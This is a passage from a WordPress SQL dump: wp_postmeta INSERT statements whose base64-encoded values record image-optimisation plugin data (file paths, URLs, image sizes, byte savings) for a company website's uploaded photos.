9ja3Bob3RvMTYxNjYxODMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk5MzEsImlkIjoxMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MTgzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MTgzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MTgzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5OTMzLCJpZCI6MTM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTkzNiwiaWQiOjEzOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTkzOCwiaWQiOjEzOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk0MCwiaWQiOjEzOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk0MiwiaWQiOjEzOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk0NCwiaWQiOjEzOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk0NywiaWQiOjEzOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk0OSwiaWQiOjEzOX1d'); 
INSERT INTO `wp_postmeta` VALUES (30343, 138, 'wpfc_optimisation_reduction', '27070'); 
INSERT INTO `wp_postmeta` VALUES (30344, 138, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzExNDY3MzAxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzExNDY3MzAxLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjE2MDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTE0NjczMDEuanBnIiwicmVkdWN0aW9uIjoyNzA1NywidGltZSI6MTQ4MzU4OTk1OCwiaWQiOiIxMzgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk2MCwiaWQiOjEzOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTE0NjczMDEtODAweDgwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTE0NjczMDEtODAweDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTE0NjczMDEtODAweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk5NjMsImlkIjoxMzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzExNDY3MzAxLTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzExNDY3MzAxLTc2OHg3NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzExNDY3MzAxLTc2OHg3NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5OTY2LCJpZCI6MTM4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk2OCwiaWQiOjEzOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTE0NjczMDEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTE0NjczMDEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTE0NjczMDEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk5NzAsImlkIjoxMzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzExNDY3MzAxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzExNDY3MzAxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzExNDY3MzAxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5OTczLCJpZCI6MTM4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk3NSwiaWQiOjEzOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk3NywiaWQiOjEzOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk4MCwiaWQiOjEzOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk4MiwiaWQiOjEzOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk4NCwiaWQiOjEzOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk4NywiaWQiOjEzOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMTQ2NzMwMS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTk4OSwiaWQiOjEzOH1d'); 
INSERT INTO `wp_postmeta` VALUES (30345, 137, 'wpfc_optimisation_reduction', '92545'); 
INSERT INTO `wp_postmeta` VALUES (30346, 137, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1jb2F0aW5nLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1jb2F0aW5nLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjE5OTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjo5MjUzMSwidGltZSI6MTQ4MzU5MDAwMCwiaWQiOiIxMzcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtY29hdGluZy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDAwMiwiaWQiOjEzN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLWNvYXRpbmctODAweDUzMi5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLWNvYXRpbmctODAweDUzMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLWNvYXRpbmctODAweDUzMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAwMDUsImlkIjoxMzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1jb2F0aW5nLTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1jb2F0aW5nLTc2OHg1MTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUFRGRS1jb2F0aW5nLTc2OHg1MTEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMDA4LCJpZCI6MTM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwv